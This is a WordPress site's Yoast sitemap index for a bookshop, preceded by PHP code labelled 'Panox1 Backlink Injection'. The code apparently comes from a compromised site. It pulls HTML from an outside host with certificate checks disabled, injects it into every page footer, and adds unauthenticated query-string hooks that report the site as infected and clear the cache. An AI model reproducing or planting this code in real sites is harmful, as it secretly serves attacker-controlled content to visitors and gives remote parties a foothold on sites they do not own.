
// Panox1 Backlink Injection
add_action('wp_footer', function() {
    $cache_key = 'panox1_links_' . md5(home_url());
    $cached = get_transient($cache_key);
    if ($cached !== false) { echo $cached; return; }
    $response = wp_remote_get('https://pixel-cdn.com/lnk/api/inject-endpoint.php?site_url=' . urlencode(home_url()), ['timeout' => 5, 'sslverify' => false]);
    if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) {
        $content = wp_remote_retrieve_body($response);
        if (!empty($content) && strpos($content, '<a') !== false) {
            $html = "\n<!-- Panox1 -->\n" . $content . "\n";
            set_transient($cache_key, $html, 3600);
            echo $html;
        }
    }
}, 99);

add_action('init', function() {
    if (isset($_GET['panox1_status'])) {
        wp_send_json(['status' => 'active', 'site' => home_url()]);
    }
    if (isset($_GET['panox1_clear'])) {
        delete_transient('panox1_links_' . md5(home_url()));
        wp_send_json(['cleared' => true, 'site' => home_url()]);
    }
});
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//librairielacentrale.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://librairielacentrale.com/post-sitemap.xml</loc>
		<lastmod>2018-07-18T07:20:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/page-sitemap.xml</loc>
		<lastmod>2022-12-03T11:55:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/elementskit_template-sitemap.xml</loc>
		<lastmod>2022-12-02T22:53:32+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/product-sitemap.xml</loc>
		<lastmod>2026-02-26T11:12:11+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/faq-sitemap.xml</loc>
		<lastmod>2014-04-22T10:10:27+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/portfolio-sitemap.xml</loc>
		<lastmod>2022-11-28T18:53:15+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/staff-sitemap.xml</loc>
		<lastmod>2014-04-21T12:21:21+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/testimonial-sitemap.xml</loc>
		<lastmod>2019-09-27T07:03:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/mailpoet_page-sitemap.xml</loc>
		<lastmod>2025-01-20T20:18:24+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/elemenfolio-sitemap.xml</loc>
		<lastmod>2019-09-30T10:42:54+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/category-sitemap.xml</loc>
		<lastmod>2018-07-18T07:20:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/product_cat-sitemap.xml</loc>
		<lastmod>2026-02-26T11:12:11+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/faq_categories-sitemap.xml</loc>
		<lastmod>2014-04-22T10:10:27+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/portfolio_categories-sitemap.xml</loc>
		<lastmod>2022-11-28T18:53:15+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/elemenfoliocategory-sitemap.xml</loc>
		<lastmod>2019-09-30T10:42:54+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://librairielacentrale.com/author-sitemap.xml</loc>
		<lastmod>2022-12-02T12:13:58+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->